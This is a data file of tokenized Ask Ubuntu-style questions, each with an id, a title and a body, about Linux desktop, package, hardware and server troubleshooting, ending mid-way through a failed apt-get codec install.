282934	solve the multiple copy and paste clipboard problem	the multiple clipboards for copy and paste are driving me crazy . is there some way to make ctrl-c , mouse highlight and menu dropdown- > copy all do the same thing so i do n't get something different depending on how i paste ?
282935	help understanding why ubuntu12.10 loads up after windows hibernation on dual boot system ?	i have a dual boot system with windows 7 and ubuntu 12.10 ( with kde ) and i have 2 problems : i ca n't hibernate from ubuntu - the screen goes black and the computer thinks a lot - it appears that the ubuntu shuts down but the computer just stays like that until i shut it down using the power button . after boot up i can see that the hibernation does n't work - everything that was open is shut down , it 's a clean startup . just for the record i can hibernate from win 7 - but it has the problem that i described below . after i hibernate from windows 7 ( a successful operation ) when i boot up it opens automatically ubuntu and in order to resume my session i need to restart the computer - is there a way to make it stop and in the boot up make it ask me what to load ? ( just the way it does regularly ) does anyone have any idea how to solve those problems ?
282936	bash : calculate 7am of next day	i would like to calculate the time for 7am of the next day with the bash . ( i want to use it to restart the computer with rtcwake ) according to the man page of date i should use % s to get a unix timestamp . but how do i get if of the next day ? ( or 7am of today = > add one day )
282937	problem with background on ubuntu 13.04 ?	i have a problem with ubuntu 13.04 , there is no wallpaper except a white one . i tried to change it but it did n't change . any suggestions ?
282939	unity style number shortcuts which also minimize the focused application ?	is there a solution on linux similar to the windows 7 win+number , or unity 's super+number shortcuts , which will also minimize the application if it is currently active and focused ? in windows 7 , if the application is already launched , and currently active , the shortcut will minimize the window , which i find very useful for reducing clutter and focusing on my task . i 've found a solution here to emulate the super+number shortcut keys with xbindkeys & wmctrl . if this is the only solution known , could you suggest with a brief example how one would add the minimize action ? ( i imagine it would require testing states and conditionals , i am completely new to linux and these commands so i have no idea if it is even possible ) .
282940	turn off sound at startup	i am just wondering how to turn off sound at startup ? i searched the web , and found a couple of solutions like : write `` amixer sset master off '' in /etc/rc.local use sudo alsactl store but neither works . edit : i now realize why the amixer command in rc.local does n't work . this is because the command executes before the alsa driver is loaded . so one solution is to use ( sleep 1 ; amixer sset master off ) in rc.local .
282948	how to increase mouse wheel sensitivity with a modifier key ?	the sensitivity of the mouse scroll wheel famously can not be adjusted as is explained in this question and the many duplicates asking the same . i am wondering whether there is a simple fix available that would allow me to have two speeds : one standard as it is now and one accelerated when used in combination with a modifier key ? i realize , i need to be careful not to clash with what 's already there ( in case i use it ) : ctrl-mousescroll : adjusts the zoom in many applications . shift-mousescroll : is used differently by some applications : no scroll ( chrome ) back and forth through browsing history ( firefox ) accelerated scroll ( editor in spyder ) horizontal scroll ( libreoffice ) normal scroll ( terminal ) alt-mousescroll no scroll ( chrome , libreoffice , terminal , libreoffice ) normal scroll ( firefox ) based on that , it would appear the alt-scroll would be a prime candidate for accelerated scrolling . how would i implement this in gnome ?
282950	after installing ubuntu 12.10 , screen get stucked after some time	after upgrading to ubuntu 12.10 ..i started facing several issue . one major issue is if i start ubuntu and start using any browser after sometime screen gets frozen and nothing works but right click still works while left click does n't work at all . i some how manage to reboot using right click or hard reset . but every time i face this issue . it happens with all the browsers like firefox , chrome , chromium etc . alt+tab also stops working ..its show very random behavior ... scrolling works with some hick-ups .
282951	how to completely uninstall eclipse ?	i 'm working on eclipse indigo on ubuntu 12.04 . i 'm trying to completely uninstall eclipse ( with synaptic package manager + mark for complete removal ) , but when i reinstall it , i clearly see that it has kept all parameters , and history , which is what i 'm trying to get rid of . i also tried the following . sudo apt-get purge eclipse rm -r ~/.eclipse/ as suggested here , no luck either .
282956	ubuntu 12.10 gnome 3 login screen bad position	operating system and config : i have ubuntu 12.10 with unity removed and installed gnome 3 desktop . everything works fine but ... when i turn on pc for the first time and gnome loads the login screen , it is kinda aside not in center . i can see something but not everything . if i log in , and log out again , login screen is ok , but it does not work after turning on pc for the first time , or after closing the notebook display . what was i doing until the problem showed up recently i was trying to install original ati drivers instead of fglrx but it did n't work so i installed fglrx back , this may be the problem but i am not sure . question : how to repair it so i can login normally like before ? : )
282957	how to create a small system partition for mythbuntu	i have mythbuntu 12.04 running with system files and mythtv recordings in the same partition . i 'd like to repartition the disk ( perhaps using a second interim drive ) to make a small system partition and a large mythtv recordings only partition on the drive . how can i go about doing this ? the reason i want to do this is i backup the system by cloning the drive which spends a lot of time unnecessarily cloning the recordings when all i need is a ( 30g ? ) system image . by partitioning the drive i should be able to clone only the system partition saving time and will give me the benefit of allowing multiple system images on the backup drive . thanks for any help you can provide .
282959	the weather section in xbmc	i am using ubuntu 12.04 and xbmc 12.1 - a fantastic product by the way . in the weather section , i would like for it to display the temperature in celsius , not fahrenheit . please advise . thanks .
282964	connect-debounce spam on tty and system suspend	the below output from dmesg shows the same thing i see when i ctrl+alt+f1 , if is stop lightdm and sometimes if i suspend the machine . [ 615.128020 ] hub 1-0:1.0 : connect-debounce failed , port 2 disabled [ 617.048017 ] hub 1-0:1.0 : connect-debounce failed , port 3 disabled [ 618.968021 ] hub 1-0:1.0 : connect-debounce failed , port 4 disabled [ 620.888022 ] hub 1-0:1.0 : connect-debounce failed , port 5 disabled [ 622.808022 ] hub 1-0:1.0 : connect-debounce failed , port 6 disabled [ 624.728022 ] hub 1-0:1.0 : connect-debounce failed , port 7 disabled [ 626.648019 ] hub 1-0:1.0 : connect-debounce failed , port 8 disabled [ 628.568044 ] hub 1-0:1.0 : connect-debounce failed , port 1 disabled [ 630.488031 ] hub 1-0:1.0 : connect-debounce failed , port 2 disabled [ 632.408026 ] hub 1-0:1.0 : connect-debounce failed , port 3 disabled [ 634.328022 ] hub 1-0:1.0 : connect-debounce failed , port 4 disabled [ 636.248022 ] hub 1-0:1.0 : connect-debounce failed , port 5 disabled [ 638.168026 ] hub 1-0:1.0 : connect-debounce failed , port 6 disabled [ 640.088031 ] hub 1-0:1.0 : connect-debounce failed , port 7 disabled [ 642.008018 ] hub 1-0:1.0 : connect-debounce failed , port 8 disabled [ 643.928025 ] hub 1-0:1.0 : connect-debounce failed , port 1 disabled [ 645.848022 ] hub 1-0:1.0 : connect-debounce failed , port 2 disabled [ 647.768020 ] hub 1-0:1.0 : connect-debounce failed , port 3 disabled [ 649.688029 ] hub 1-0:1.0 : connect-debounce failed , port 4 disabled here is the output from lsusb : bus 007 device 002 : id 046d : c315 logitech , inc. classic new touch keyboard bus 007 device 003 : id 1532:0009 razer usa , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub when going into tty i can alt+f7 back into xfce without any issue , but i ca n't do anything else . note : i know the onboard usb controller is bad . it 's really spotty as to whether it will recognize what 's plugged in to it . i had to add a pci controller only a few weeks before rolling over to linux . xubuntu 12.10 uname 3.5.0-27-generic # 46-ubuntu smp mon mar 25 19:58:17 utc 2013 x86_64 x86_64 x86_64 gnu/linux
282968	what libreoffice format works best in ms office ?	for a school project i need to collaborate with a lot of different people , and they all use ms office . of course they all have problems with opening .odt files . ( even though ms says that office should open them just fine.. ) . they all get messages that the file is corrupt . normally they can recover the content , but with messed up formatting . so i was wondering.. what file format is the most compatible with microsoft word ? also another thing i wondered for a while.. i saw that there are two options for .docx when i save a new document , office open xml and office 2007/2010 or something . which of the 2 should i use ? hopefully someone is able to help out ! : )
282972	how to resolve perl module error while trying to run ngs qc toolkit ?	i was trying to run ngs qc toolkit http : //59.163.192.90:8080/ngsqctoolkit/ in ubuntu 12.04 lts 64 bit version . but , after executing the command , an error shows that states it can not find module string : :approx and needs to be installed even though i have installed it successfully . here is the command which i used : perl ~/programs/ngsqctoolkit_v2.3/qc/illuqc_prll.pl -c 2 -pe /home/shrujan/desktop/ngs_shrujan/srr072111_1.fastq /home/shrujan/desktop/ngs_shrujan/srr072111_2.fastq 2 a error : can not find module 'string : :approx' install it and try again please guide me in resolving this issue .
282975	why do i have different kernel versions on same distribution version	i ( re ) installed mythbuntu 12.04.2 to solve an audio problem . after the installation i find that the kernel version of this mythtv front-end is 3.5.0-27-generic . however on the fully-updated mytbuntu 12.04âś front-end/back-end server ( installed as 12.04.1 ) , the kernel version is 3.2.0-40-generic . why are these different version , i wonderâś
282979	`` latex it ! '' button ( add-on for thunderbird ) not accessible ?	they say here that it works great after.. manually adding the `` latex it ! '' button but how does on manually adds a `` latex it ! '' button ? without it there is no way to use this add-on . i 'm not sure this is a ubuntu specific issue so if you know of a better outlet for asking this question , please let me know .
282981	how to set libreoffice to use persian / arabic-indic / hindi page numbers ?	i want to have my page numbers in libreoffice impress to be in persian . which means ۰۱۲۳۴۵۶۷۸۹ instead of 0123456789 .
282985	no pulseaudio in skype sound devices choices , and microphone does not workâś	i have a new re-install of mythbuntu 12.04.2 lts . when i installed skype 4.1.0.20 and tried to use it , i found that under options/sound devices/ , under the three ( microphone , speakers and ringing ) there were no `` pulseaudio server ( local ) '' options . this was unexpected since on my several other linux systems that also use pulseaudio `` pulseaudio server ( local ) '' was the only option . also the microphone is now mute , although not shown muted in alsamixer . in place of `` pulseaudio server ( local ) '' there is a long list of devices including many for the logitech ak5370 microphone i use . none seem to work . furthermore the button to open pulseaudio volume control on options/sound devices missing in the new install . what could possibly be wrong ? update : strange behavior : i discovered one of the eight choices will work . but it seems that after cold boot , it is a different one . so everyday after boot , i spend a âź hour or trying each one until i find one that works . .. ? .. ? .. ?
282988	ubuntu 12.04 - eclipse juno wo n't run apps	i 'm installing eclipse juno for my son , who is trying to learn java . i can start eclipse ok and create a simple 'hello world ' program , but when i try to run my code it wo n't output to console . when i write a simple program that should pop open a window , i 'm not able to even do that . both programs appear to compile ok - i can go to my eclipse/ < app > /bin folder and they will run just fine using java < classname > i thought that the issue might be that it was n't locating the java binary , so i inserted the following lines into my global /etc/eclipse.ini file : -vm /path/to/java but this did n't work . i have the same issues when i install indigo from the ubuntu repo , so i do n't think it 's something with eclipse itself . other folks obviously run it successfully on ubuntu 12.04 . what am i missing ? ps - in case it matters , i 'm using : java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.3 ) ( 6b27-1.12.3-0ubuntu1~12.04.1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) thanks again !
282989	what is the best pratice to host a website on a ubuntu server machine ?	i wonder what the best practice where we put a website/application on a server . commonly there that we should not put them in our folder /var/wwwfor several reasons . i was searching and found two alternatives to host the site example.com : put it in the folder /srv/www/example.com ( reference here ) and give permission only to administrative users to it . other services , such as ftp , would be in /srv/ftp/example.com . the purpose of the /srv folder we can see here . treat the application as if it were a user ( reference here ) . in this case the user would be example and the application would be staying in /home/example/public_html and perhaps ftp in / home/example/ftp . so , is there any better practice than these two ? what is the most recommended and why ? what are the advantages and disadvantages of each ? ps . 1 : if there are any better suggestions , please write a description of it stating what are your strengths and weaknesses . ps . 2 : for while i 'm using ubuntu 12.10 server . extra : if there is any tutorial or guide that defines which folders are the best to host the various features of an application ( such as logs , services , settings , etc.. ) , i really would like to know .
282990	what are the differences between the different input methods ?	i am currently using ibus as input method ( i am learning japanese and korean ) which is default in ubuntu but i do n't like it very much ( not sure why though ) . i know there are other ims like scim or uim but i could n't find any comparisons . i read that scim was replaced by ibus because it was buggy and did n't have support for gtk3 so i probably wo n't use this one but what are differences between various ims and why is ibus preferred ?
282993	installing ubuntu on a powerbook g4 667- unable to boot	first of all , thanks for your time . i see that every time this question was asked , the thread was closed before it got an answer . so please , can you at least point me in that right direction ? when going to the boot menu ( after pressing option ) , the powerbook g4 667mhz detects the installer ( either on a cd or flashdrive - depending on what i am using ) but when i choose the linux installer the screen flashes and the menu comes back in low resolution . only the mouse works . i suspect the firmware is looking for a very specific configuration in the disc and it is not finding it . the same problem happens if i try to boot up the leopard ( osx 10.5 ) installer or diskwarrior 4 . but diskwarrior 3.3 and the tiger ( osx 10.4 ) installer boot up without a problem . it is not the ubuntu installer because it works fine on an imac . maybe there is a way to work on yaboot or grub to talk the the tibook ? any ideas ? the processor is : powerpc 7440 g4 in system profiler i get : processor name : powerpc g4 ( 2.1 ) boot rom version : 4.2.9f1 the installer is for powerpc , and it works fine in my imac ( another powerpc g4 ) . it seems to be something more specific . i have tried different distros ( yellow dog , lubuntu , debian ) and they all have the same problem with this computer but not with the imac . like i thought , it has to do with yaboot . i restored the image of the installer in another partition of the hard drive and forced the boot from the firmware . yaboot starts and flashes these lines : loading xcoff tsize=28000 dsize=2000 bsize=3a000 entry=5616ecc sections .text 05600000 05600000 00028000 000000d4 .data 05628000 05628000 00002000 000280d4 .bss 0562a000 0562a000 0003a000 00000000 loading .tex , done loading .data , done clearing .bss , done after which it shows the `` forbidden/not allowed/cross out circle sign '' that indicates that the operating system is in a broken folder or corrupted ( i think , i have n't seen that symbol in a while )
282994	how do you get the website title to show up in the menu area / webpage title are in python / quickly created web browser ?	hi there im creating a web browser using a mix of quickly and python , im wanting to get a websites title to show up in the very top of the page . im not sure of what code that i need adding to the file , ive looked all over the internet and that has been of no use . this is the code i have got for the browser so far : import gettext from gettext import gettext as _ gettext.textdomain ( 'dmbrowser ' ) from gi.repository import gtk , webkit # pylint : disable=e0611 import logging logger = logging.getlogger ( 'dmbrowser ' ) from dmbrowser_lib import window from dmbrowser.aboutdmbrowserdialog import aboutdmbrowserdialog from dmbrowser.preferencesdmbrowserdialog import preferencesdmbrowserdialog # see dmbrowser_lib.window.py for more details about how this class works class dmbrowserwindow ( window ) : __gtype_name__ = `` dmbrowserwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( dmbrowserwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutdmbrowserdialog self.preferencesdialog = preferencesdmbrowserdialog # code for other initialization actions should be added here . self.backbutton = self.builder.get_object ( `` backbutton '' ) self.forwardbutton = self.builder.get_object ( `` forwardbutton '' ) self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) self.stopbutton = self.builder.get_object ( `` stopbutton '' ) self.urlentry = self.builder.get_object ( `` urlentry '' ) self.scrolledwindow = self.builder.get_object ( `` scrolledwindow '' ) self.toolbar = self.builder.get_object ( `` toolbar '' ) context = self.toolbar.get_style_context ( ) context.add_class ( gtk.style_class_primary_toolbar ) self.webview = webkit.webview ( ) self.scrolledwindow.add ( self.webview ) self.webview.show ( ) def on_backbutton_clicked ( self , widget ) : self.webview.go_back ( ) def on_forwardbutton_clicked ( self , widget ) : self.webview.go_forward ( ) def on_refreshbutton_clicked ( self , widget ) : self.webview.reload ( ) def on_stopbutton_clicked ( self , widget ) : self.webview.stop_loading ( ) def on_urlentry_activate ( self , widget ) : url = widget.get_text ( ) self.webview.open ( `` http : // '' + url ) print url
282997	accessing phpmyadmin remotely	i 've installed and got everything working and set up fine and i can install phpmyadmin fine as well , but i am unable to access it remotely . i 've tried adding the following into /etc/phpmyadmin/apache.conf with no luck order allow , deny allow from all and i 've also tried the follow in /etc/phpmyadmin/config.inc.php $ cfg [ 'servers ' ] [ $ i ] [ 'allowdeny ' ] [ 'order ' ] = 'allow , deny ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'allowdeny ' ] [ 'rules ' ] = array ( 'allow % from all' as well as $ cfg [ 'pmaabsoluteuri ' ] = 'www.domain.co.uk/phpmyadmin ' ; but whenever i enter www.domain.co.uk/phpmyadmin it 's redirected to localhost/phpmyadmin . it works fine on the machine itself , but i need remote access .
283002	ubuntu suddenly stopped booting to gui and startx stalls	i am running ubuntu 12.04 . a few hours ago , i started up my machine , checked my email , played a couple albums on spotify and turned it off again . i did not notice anything out of the ordinary and i did not make any configuration changes . just a few minutes ago , i turned it back on and : the computer posts the boot screen is showed and default boots to my ubuntu install a screen with the multicolored background and the word `` ubuntu '' shows for a split second a command line prompt appears when i enter the startx command the following is outputted to the screen and then the computer stalls ( no gui and no command prompt ) : saned disabled ; edit /etc/default/saned *checking battery state ... sck from util-linux 2.20.1 fsck : warning : bad format on line 13 of /etc/fstab /dev/sdb1 : clean , 461266/4497408 files , 3928938/17966848 blocks modem-manager [ 1043 ] : < info > modemmanager ( version 0.5.2.0 ) starting ... modem-manager [ 1043 ] < info > loaded plugin x22x '' `` longcheer '' `` option '' `` zte '' `` motoc '' `` novatel '' `` sierra '' `` linktop '' `` gobi '' `` nokia '' `` simtech '' `` generic skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd skipping profile in /etc/apparmor.d/disable : usr.bin.firefox *starting apparmor profiles speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *starting the winbind daemon windbind i tried commenting out line 13 of fstab , but that did n't make a difference . i dual boot with a windows 7 install , but have not booted that for a few days . i have an amd graphics card that uses the proprietary drivers . i saw this post but a comment on the post said the post was dead and if you have similar issues , post a new question .
283004	how to transfer ( network ) printer configurations to multiple computers ?	i have 3 printers which need to be configured manually ( driver , duplex yes/no , etc. ) . everything needed is already present on the ubuntu ( precise , 12.04 lts ) standard installation . so it is basically only the configuration . so far i am looking up the settings on a computer which has the printers already configured , and configure each of the three printer manually on each new computer . this is a very tedious task . is there a way to create a printer-config-file which i could just hand out to users ? then they either just import the file , or double click it to have the printer configured .
283015	windows 8 live cd	i downloaded the iso file and burned it to a dvd but it does n't seem to be burnt to it correctly i cant boot ubuntu from it .
283018	ubuntu detects 2 monitors when i only have one	ubuntu detects 2 monitors when i only have 1 . this causes an issue when booting up because it 's detecting 2 monitors and by default it is mirroring the display ; which is causing a distorted picture since it 's trying to create a mirror image on 1 display . xrandr output ... . the vga1 is the phantom monitor and i need to remove it so it boots to lvds1 and not mirrored . any suggestions on how to permanently remove vga1 ? : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 vga1 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1920x1080 59.6*+ 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9
283019	how to install the mysql connector for c # ?	i installed wine and now i have setup mono & .net when i try to compile the next sentence , i get an error because i do n't have the mysql connector installed on my system . using mysql.data.mysqlclient ; the type or namespace name `mysql ' could not be found . are you missing a using directive or an assembly reference ? i do n't understand very well why , because i can connect to mysql using the monodeveloped ide and i can submit queries obtaining responses with excellent results ! searching on internet , i found out that i need the mysql connector ( for the .net + mono platform ) to compile this code . so i downloaded the connector and read installing connector/net on unix with mono from mysql reference , but i have no idea where is the mono project installation folder . how can i install this connector so the code can be compiled without errors ?
283020	ubuntu 12.04 package issues	i have a fresh install of 12.04 ran the updates just fine . ( i hate not having my synaptic package manager ) i went to fetch k9copy and this is what i got . package uudeview is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source i went to the website and downloaded the .deb but after i dpkg -i blah.deb iâm not sure what to do from there . but , i get this error also when trying to fetch the different media codecs and such . here is it all failing at once but the wall papers it looks like . $ sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring reading package lists ... building dependency tree ... reading state information ... the following new packages will be installed : medibuntu-keyring 0 upgraded , 1 newly installed , 0 to remove and 32 not upgraded . need to get 3,448 b of archives . after this operation , 49.2 kb of additional disk space will be used . warning : the following packages can not be authenticated ! medibuntu-keyring authentication warning overridden . get:1 http : //packages.medibuntu.org/ precise/free medibuntu-keyring all 2008.04.20 [ 3,448 b ] fetched 3,448 b in 0s ( 11.2 kb/s ) selecting previously unselected package medibuntu-keyring . ( reading database ... 141467 files and directories currently installed . ) unpacking medibuntu-keyring ( from ... /medibuntu-keyring_2008.04.20_all.deb ) ... setting up medibuntu-keyring ( 2008.04.20 ) ... ok customer @ customer-vgc-rb40 : ~ $ sudo apt-get install firestarter synaptic ubuntu-tweak vlc gimp gimp-data gimp-plugin-registry gimp-data-extras openshot openshot-doc transmission-gtk transmission-common y-ppa-manager skype bleachbit indicator-ubuntuone lo-menubar libxss1 libnss3-1d openjdk-7-jre unace unrar zip unzip p7zip-full p7zip-rar sharutils rar uudeview mpack lha arj cabextract file-roller non-free-codecs libxine1-ffmpeg gxine mencoder flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview libmpeg3-1 mpeg3-utils mpegdemux liba52-dev mpeg2dec vorbis-tools id3v2 mpg321 mpg123 libflac++6 ffmpeg totem-mozilla icedax tagtool easytag id3tool lame nautilus-actions-extra nautilus-script-audio-convert libmad0 libjpeg-progs libdvdcss2 w32codecs libavcodec53 libavutil51 ubuntu-restricted-extras app-install-data-medibuntu apport-hooks-medibuntu ubuntu-wallpapers* reading package lists ... done building dependency tree reading state information ... done note , selecting 'ubuntu-wallpapers-lucid ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-maverick ' for regex 'ubuntu-wallpapers*' note , selecting 'edubuntu-wallpapers ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-precise ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-extra ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-oneiric ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-karmic ' for regex 'ubuntu-wallpapers*' note , selecting 'ubuntu-wallpapers-natty ' for regex 'ubuntu-wallpapers*' note , selecting 'blubuntu-wallpapers ' for regex 'ubuntu-wallpapers*' note , selecting 'xubuntu-wallpapers ' for regex 'ubuntu-wallpapers*' package libxine1-ffmpeg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package arj is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package cabextract is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package synaptic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package p7zip-full is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package icedax is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sox is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package unace is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package gimp-data-extras is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package lame is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libmpeg2-4 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package easytag is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package bleachbit is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package faad is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package ffmpeg2theora is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package firestarter is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package gimp-plugin-registry is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package gxine is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package id3tool is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package id3v2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libmpeg3-1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package lo-menubar is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpack is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpeg2dec is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpeg3-utils is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpegdemux is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpg123 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpg321 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package nautilus-script-audio-convert is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package openshot is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package openshot-doc is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package tagtool is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package uudeview is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'firestarter ' has no installation candidate e : package 'synaptic ' has no installation candidate e : package 'gimp-plugin-registry ' has no installation candidate e : package 'gimp-data-extras ' has no installation candidate e : package 'openshot ' has no installation candidate e : package 'openshot-doc ' has no installation candidate e : unable to locate package skype e : package 'bleachbit ' has no installation candidate e : package 'lo-menubar ' has no installation candidate e : package 'unace ' has no installation candidate e : package 'p7zip-full ' has no installation candidate e : package 'uudeview ' has no installation candidate e : package 'mpack ' has no installation candidate e : package 'arj ' has no installation candidate e : package 'cabextract ' has no installation candidate e : package 'libxine1-ffmpeg ' has no installation candidate e : package 'gxine ' has no installation candidate e : package 'faad ' has no installation candidate e : package 'sox ' has no installation candidate e : package 'ffmpeg2theora ' has no installation candidate e : package 'libmpeg2-4 ' has no installation candidate e : package 'uudeview ' has no installation candidate e : package 'libmpeg3-1 ' has no installation candidate e : package 'mpeg3-utils ' has no installation candidate e : package 'mpegdemux ' has no installation candidate e : unable to locate package liba52-dev e : package 'mpeg2dec ' has no installation candidate e : package 'id3v2 ' has no installation candidate e : package 'mpg321 ' has no installation candidate e : package 'mpg123 ' has no installation candidate e : package 'icedax ' has no installation candidate e : package 'tagtool ' has no installation candidate e : package 'easytag ' has no installation candidate e : package 'id3tool ' has no installation candidate e : package 'lame ' has no installation candidate e : package 'nautilus-script-audio-convert ' has no installation candidate customer @ customer-vgc-rb40 : ~ $ sudo apt-get install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 32 not upgraded . customer @ customer-vgc-rb40 : ~ $ non-free-codecs libxine1-ffmpeg gxine mencoder flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview libmpeg3-1 mpeg3-utils mpegdemux liba52-dev mpeg2dec vorbis-tools id3v2 mpg321 mpg123 libflac++6 ffmpeg totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 libjpeg-progs libdvdcss2 w32codecs libavcodec53 libavutil51 ubuntu-restricted-extras app-install-data-medibuntu apport-hooks-medibuntu non-free-codecs : command not found customer @ customer-vgc-rb40 : ~ $ sudo apt-get non-free-codecs libxine1-ffmpeg gxine mencoder flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview libmpeg3-1 mpeg3-utils mpegdemux liba52-dev mpeg2dec vorbis-tools id3v2 mpg321 mpg123 libflac++6 ffmpeg totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 libjpeg-progs libdvdcss2 w32codecs libavcodec53 libavutil51 ubuntu-restricted-extras app-install-data-medibuntu apport-hooks-medibuntu e : invalid operation non-free-codecs customer @ customer-vgc-rb40 : ~ $ sudo apt-get install non-free-codecs libxine1-ffmpeg gxine mencoder flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview libmpeg3-1 mpeg3-utils mpegdemux liba52-dev mpeg2dec vorbis-tools id3v2 mpg321 mpg123 libflac++6 ffmpeg totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 libjpeg-progs libdvdcss2 w32codecs libavcodec53 libavutil51 ubuntu-restricted-extras app-install-data-medibuntu apport-hooks-medibuntu reading package lists ... done building dependency tree reading state information ... done package libxine1-ffmpeg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package icedax is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sox is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package lame is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libmpeg2-4 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package easytag is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package faad is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package ffmpeg2theora is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package gxine is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package id3tool is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package id3v2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libmpeg3-1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpeg2dec is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpeg3-utils is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpegdemux is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpg123 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mpg321 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package nautilus-script-audio-convert is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package tagtool is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package uudeview is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libxine1-ffmpeg ' has no installation candidate e : package 'gxine ' has no installation candidate e : package 'faad ' has no 